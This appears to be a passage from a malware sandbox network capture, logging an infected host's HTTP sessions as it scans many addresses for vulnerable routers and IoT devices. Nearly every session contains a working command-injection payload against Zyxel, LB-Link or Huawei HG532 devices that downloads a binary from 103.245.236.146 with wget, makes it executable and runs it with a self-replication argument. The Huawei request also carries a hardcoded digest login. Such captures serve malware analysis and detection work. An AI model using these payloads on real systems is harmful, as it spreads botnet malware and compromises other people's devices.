                                                  Jan 19, 2024 18:24:07.295831919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7394192.168.2.135864432.122.189.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.295866013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7395192.168.2.135127218.248.211.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.295914888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7396192.168.2.1341376198.41.201.2238080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.607665062 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:07.748161077 CET328INHTTP/1.1 400 Bad Request
                                                  Server: cloudflare
                                                  Date: Fri, 19 Jan 2024 17:24:07 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 155
                                                  Connection: close
                                                  CF-RAY: -
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7397192.168.2.133636667.60.7.1518080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.607738018 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7398192.168.2.1341074216.158.209.2298080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.898423910 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:08.048927069 CET1286INHTTP/1.0 400 Bad Request
                                                  Server: squid/3.1.9
                                                  Mime-Version: 1.0
                                                  Date: Fri, 19 Jan 2024 16:51:19 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 3175
                                                  X-Squid-Error: ERR_INVALID_URL 0
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7399192.168.2.135296841.34.106.15137215
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.070779085 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 472
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  Jan 19, 2024 18:24:08.353221893 CET182INHTTP/1.1 500 Internal Server Error
                                                  Content-Type: text/xml; charset="utf-8"
                                                  Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                  EXT:
                                                  Connection: Keep-Alive
                                                  Content-Length: 398


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7400192.168.2.134160464.113.8.688080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.072364092 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:08.247133970 CET371INHTTP/1.1 301 Moved Permanently
                                                  X-Frame-Options: SAMEORIGIN
                                                  Content-Security-Policy: frame-ancestors 'self'
                                                  X-XSS-Protection: 1; mode=block
                                                  Strict-Transport-Security: max-age=15552000
                                                  location: https://:8443/goform/set_LimitClient_cfg
                                                  Date: Fri, 19 Jan 2024 17:24:07 GMT
                                                  Connection: keep-alive
                                                  Keep-Alive: timeout=5
                                                  Transfer-Encoding: chunked
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7401192.168.2.1357656179.0.29.1968080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.073872089 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7402192.168.2.1338684115.160.50.28080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.169822931 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:10.409523010 CET339INHTTP/1.1 400 Bad Request
                                                  Date: Fri, 19 Jan 2024 17:24:07 GMT
                                                  Server: Boa/0.94.14rc21
                                                  Accept-Ranges: bytes
                                                  Connection: close
                                                  Content-Type: text/html; charset=ISO-8859-1
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                  Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7403192.168.2.1357964106.50.175.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.304905891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7404192.168.2.1336930159.85.38.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.304934025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7405192.168.2.135144220.171.76.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.304991007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7406192.168.2.1334202211.157.103.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305028915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7407192.168.2.135230078.103.82.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305071115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7408192.168.2.1351316125.148.200.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305124044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7409192.168.2.1360464144.164.162.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305164099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7410192.168.2.134481284.133.176.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305224895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7411192.168.2.1348598202.110.197.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305258036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7412192.168.2.135766881.28.110.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305311918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7413192.168.2.134722614.218.5.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305349112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7414192.168.2.1353620202.181.34.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305380106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7415192.168.2.1353768211.57.38.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305433989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7416192.168.2.1355766206.4.168.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305464029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7417192.168.2.1351770100.12.82.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305491924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7418192.168.2.1353410161.116.201.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305542946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7419192.168.2.133607612.188.220.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305597067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7420192.168.2.1356786149.131.120.75443
                                                  TimestampBytes transferredDirectionData
